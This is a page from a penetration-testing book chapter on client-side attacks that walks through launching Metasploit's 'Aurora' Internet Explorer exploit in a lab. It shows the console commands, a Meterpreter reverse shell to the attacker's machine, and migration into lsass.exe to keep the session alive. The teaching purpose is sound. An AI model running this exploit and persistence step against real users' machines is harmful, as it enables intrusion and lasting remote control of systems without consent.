background image

Exploitation Using Client-Side Attacks

117

msf exploit(ms10_002_aurora) > 

set LHOST 192.168.33.129

LHOST => 192.168.33.129
msf exploit(ms10_002_aurora) > 

set LPORT 443

LPORT => 443
msf exploit(ms10_002_aurora) > 

exploit -z

[*] Exploit running as background job.
msf exploit(ms10_002_aurora) >
[*] Started reverse handler on 192.168.33.129:443
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.33.129:80/
[*] Server started.

msf exploit(ms10_002_aurora) >

First, notice that the default setting for 

SRVHOST

   is 0.0.0.0: This means 

that the web server will bind to all interfaces. The 

SRVPORT

 at  , 8080, is the 

port to which the targeted user needs to connect for the exploit to trigger. 
We will be using port 80 instead of 8080, however. We could also set up the 
server for SSL, but for this example, we’ll stick with standard HTTP. 

URIPATH

   

is the URL the user will need to enter to trigger the vulnerability, and we set 
this to a slash (

/

) at  .

With our settings defined, use your Windows XP virtual machine and 

connect to the attacker using 

http://

<

attacker’s IP address

>. You’ll notice the 

machine becomes a bit sluggish. After a little waiting, you should see a Meter-
preter shell. In the background, the heap spray was performed and the jump 
into the dynamic memory was executed, to hit your shellcode eventually. If 
you open Task Manager in Windows before you run this exploit, you can 
actually see the memory for 

iexplore.exe

 growing significantly based on the 

contact growth of the heap. 

msf exploit(ms10_002_aurora) >
[*] Sending Internet Explorer "Aurora" Memory Corruption to client 192.168.33.130
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:443 -> 192.168.33.130:1161)

msf exploit(ms10_002_aurora) > 

sessions -i 1

[*] Starting interaction with 1...

meterpreter >

You now have a Meterpreter shell, but there’s a slight problem. What if 

the targeted user closes the browser based on the sluggishness of her com-
puter? You would effectively lose your session to the target, and although the 
exploit is successful, it would be cut off prematurely. Fortunately, there is a way 
around this: Simply type 

run migrate

 as soon as the connection is established, and 

hope that you make it in time. This Meterpreter script automatically migrates 
to the memory space of a separate process, usually 

lsass.exe

, to improve the 

chances of keeping your shell open if the targeted user closes the originally 
exploited process.